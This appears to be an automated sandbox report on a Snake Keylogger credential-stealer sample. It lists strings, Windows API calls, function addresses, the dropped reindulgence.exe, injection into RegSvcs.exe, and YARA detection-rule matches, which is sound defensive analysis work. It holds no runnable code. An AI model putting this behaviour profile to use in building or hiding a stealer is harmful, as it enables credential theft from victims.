memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_07f22056-7
Source: reindulgence.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_09da450d-a
Source: reindulgence.exe.0.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_45d5f095-3

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B0D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00B0D5EB

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00B01201

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B0E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_00B0E8F6
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FCE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_00FCE8F6

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AA8060	0_2_00AA8060
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B12046	0_2_00B12046
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B08298	0_2_00B08298
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00ADE4FF	0_2_00ADE4FF
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AD676B	0_2_00AD676B
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B34873	0_2_00B34873
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00ACCAA0	0_2_00ACCAA0
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AACAF0	0_2_00AACAF0
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00ABCC39	0_2_00ABCC39
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AD6DD9	0_2_00AD6DD9
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00ABD064	0_2_00ABD064
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AA91C0	0_2_00AA91C0
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00ABB119	0_2_00ABB119
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AC1394	0_2_00AC1394
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AC1706	0_2_00AC1706
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AC781B	0_2_00AC781B
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AC19B0	0_2_00AC19B0
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AA7920	0_2_00AA7920
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AB997D	0_2_00AB997D
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AC7A4A	0_2_00AC7A4A
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AC7CA7	0_2_00AC7CA7
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AC1C77	0_2_00AC1C77
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AD9EEE	0_2_00AD9EEE
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B2BE44	0_2_00B2BE44
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AC1F32	0_2_00AC1F32
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_017C7108	0_2_017C7108
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F68060	2_2_00F68060
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FD2046	2_2_00FD2046
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FC8298	2_2_00FC8298
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F9E4FF	2_2_00F9E4FF
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F9676B	2_2_00F9676B
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FF4873	2_2_00FF4873
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F6CAF0	2_2_00F6CAF0
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F8CAA0	2_2_00F8CAA0
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F7CC39	2_2_00F7CC39
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F96DD9	2_2_00F96DD9
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F691C0	2_2_00F691C0
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F7B119	2_2_00F7B119
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F81394	2_2_00F81394
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F81706	2_2_00F81706
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F8781B	2_2_00F8781B
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F819B0	2_2_00F819B0
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F7997D	2_2_00F7997D
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F67920	2_2_00F67920
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F87A4A	2_2_00F87A4A
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FB3CE7	2_2_00FB3CE7
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F87CA7	2_2_00F87CA7
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F81C77	2_2_00F81C77
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F99EEE	2_2_00F99EEE
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FEBE44	2_2_00FEBE44
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F81F32	2_2_00F81F32
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_0128E480	2_2_0128E480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0275D278	3_2_0275D278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02755362	3_2_02755362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0275C147	3_2_0275C147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0275C738	3_2_0275C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0275CA08	3_2_0275CA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027569A0	3_2_027569A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0275E988	3_2_0275E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02753E09	3_2_02753E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02756FC8	3_2_02756FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0275CFA9	3_2_0275CFA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0275CCD8	3_2_0275CCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02759DE0	3_2_02759DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0275F631	3_2_0275F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0275FA88	3_2_0275FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0275E97B	3_2_0275E97B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06331E80	3_2_06331E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_063317A0	3_2_063317A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06339C70	3_2_06339C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06339548	3_2_06339548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06330B30	3_2_06330B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06335028	3_2_06335028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06332968	3_2_06332968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633DE00	3_2_0633DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06331E70	3_2_06331E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633E6B0	3_2_0633E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633E6AF	3_2_0633E6AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633EF60	3_2_0633EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633EF51	3_2_0633EF51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633178F	3_2_0633178F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633FC68	3_2_0633FC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06339C6D	3_2_06339C6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633FC5E	3_2_0633FC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633CCA0	3_2_0633CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633D550	3_2_0633D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633D540	3_2_0633D540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633DDFF	3_2_0633DDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633E258	3_2_0633E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633E24A	3_2_0633E24A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633EAF8	3_2_0633EAF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06330B20	3_2_06330B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06339328	3_2_06339328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633EB08	3_2_0633EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633F3B8	3_2_0633F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06338BA0	3_2_06338BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633C3AE	3_2_0633C3AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06338B90	3_2_06338B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633003F	3_2_0633003F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633F810	3_2_0633F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633501C	3_2_0633501C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633F802	3_2_0633F802
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06330040	3_2_06330040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633D0F8	3_2_0633D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633295B	3_2_0633295B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633D9A8	3_2_0633D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633D999	3_2_0633D999
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 6_2_01405F48	6_2_01405F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0126C146	7_2_0126C146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0126A088	7_2_0126A088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01265362	7_2_01265362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0126D278	7_2_0126D278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0126C468	7_2_0126C468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0126C738	7_2_0126C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012669A0	7_2_012669A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0126E988	7_2_0126E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0126CA08	7_2_0126CA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0126CCD8	7_2_0126CCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0126CFAA	7_2_0126CFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01266FC8	7_2_01266FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0126F644	7_2_0126F644
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0126E97A	7_2_0126E97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012629E0	7_2_012629E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0126FA9C	7_2_0126FA9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01263A99	7_2_01263A99
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01263E09	7_2_01263E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD2968	7_2_01AD2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD9548	7_2_01AD9548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD5028	7_2_01AD5028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD9C18	7_2_01AD9C18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD17A0	7_2_01AD17A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD0B30	7_2_01AD0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD1E80	7_2_01AD1E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADD9A8	7_2_01ADD9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADD999	7_2_01ADD999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADDDF1	7_2_01ADDDF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADD540	7_2_01ADD540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADD550	7_2_01ADD550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADCCA0	7_2_01ADCCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADCC8F	7_2_01ADCC8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADD0E9	7_2_01ADD0E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADD0F8	7_2_01ADD0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADF805	7_2_01ADF805
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD0006	7_2_01AD0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD5018	7_2_01AD5018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADF810	7_2_01ADF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADFC68	7_2_01ADFC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD0040	7_2_01AD0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADF3A8	7_2_01ADF3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD8BA0	7_2_01AD8BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADF3B8	7_2_01ADF3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD178F	7_2_01AD178F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD8B90	7_2_01AD8B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD9328	7_2_01AD9328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD0B20	7_2_01AD0B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADEB08	7_2_01ADEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADEF60	7_2_01ADEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADEF51	7_2_01ADEF51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADE6A0	7_2_01ADE6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADE6B0	7_2_01ADE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADEAF8	7_2_01ADEAF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADDE00	7_2_01ADDE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD1E70	7_2_01AD1E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADE258	7_2_01ADE258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01ADE257	7_2_01ADE257

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: String function: 00ABF9F2 appears 40 times
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: String function: 00AA9CB3 appears 31 times
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: String function: 00AC0A30 appears 46 times
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: String function: 00F69CB3 appears 31 times
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: String function: 00F7F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: String function: 00F80A30 appears 46 times

Source: oagkiAhXgZ.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
